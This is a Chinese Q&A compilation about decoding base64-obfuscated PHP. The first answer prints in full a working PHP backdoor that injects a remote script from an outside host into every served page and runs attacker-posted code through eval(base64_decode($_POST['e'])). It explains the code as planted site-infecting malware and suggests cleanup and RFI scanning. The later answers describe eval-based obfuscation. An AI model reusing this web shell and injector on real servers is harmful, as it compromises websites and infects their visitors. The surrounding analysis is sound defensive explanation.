① 帮忙解密php base64加密最好解决方案也提出下。100求破码200求解决方案
if(!isset($ev8l1)){function ev8l($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a='<script src=http://griffintoilethire.co.uk/images/s7cg/gifimg.php ></script>','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);elseif(strpos($s,',a'))$s.=$a;return $s;}function ev8l2($a,$b,$c,$d){global $ev8l1;$s=array();if(function_exists($ev8l1))call_user_func($ev8l1,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='ev8l')return;elseif($a=='ob_gzhandler')break;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('ev8l');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$ev8ll=(($a=@set_error_handler('ev8l2'))!='ev8l2')?$a:0;eval(base64_decode($_POST['e']));
意思是将参数中的<script>...</script>部分替换为<script src=http://griffintoilethire.co.uk/images/s7cg/gifimg.php ></script>,这样你的网页就被挂上了马。这段代码应该是通过webshell上传到你机器上的一段挂马程序,至于webshell 的打开有很多原因,即然是php代码那么你的机器上很可能存在php远程文件包含漏洞,也就是如果你的机器上存在Wordtrans、WordPress、rgboard、phpcms等php程序,那么很可能就有这个的漏洞。
推荐解决方法:
1.恢复已被篡改的网页
2.找一个RFI扫描器对本机进行扫描,将找到的漏洞进行修补(相应的程序网上都有对应的修补方法)
② php base64 decode 解密
PHP中的Base64解密涉及到一系列函数的使用,其中关键的步骤是通过base64_decode函数对加密后的代码进行解密。例如,代码中的connect_sqlmysql($code)函数就是通过解码Base64编码来连接MySQL数据库。另一个例子是met_encode函数,它接受编码后的字符串作为输入,使用base64_encode进行编码处理。
在解密过程中,函数run_strtext($code)特别值得注意,它使用eval函数执行解密后的字符串,这可能会带来安全风险,因为eval可以执行任意的PHP代码。而strtoiower函数两次出现,一次使用gzinflate解压缩,一次使用gzdeflate进行压缩,这可能是数据处理或混淆步骤的一部分。
解密的具体步骤和方法已通过邮件发送,建议您查看邮件获取详细内容。在处理此类操作时,务必注意代码安全,特别是在使用eval时要谨慎,以防止潜在的安全威胁。
③ 求高手解密 base64 谁见过这样的加密
原理其实很简单,上面是用“|”分割的base64编码过的字符串。首先将“|”替换为空去掉干扰,然后base64_decode得到源码,然后eval执行。
不过从你复制的4|M“;看来,你应该是复制错了。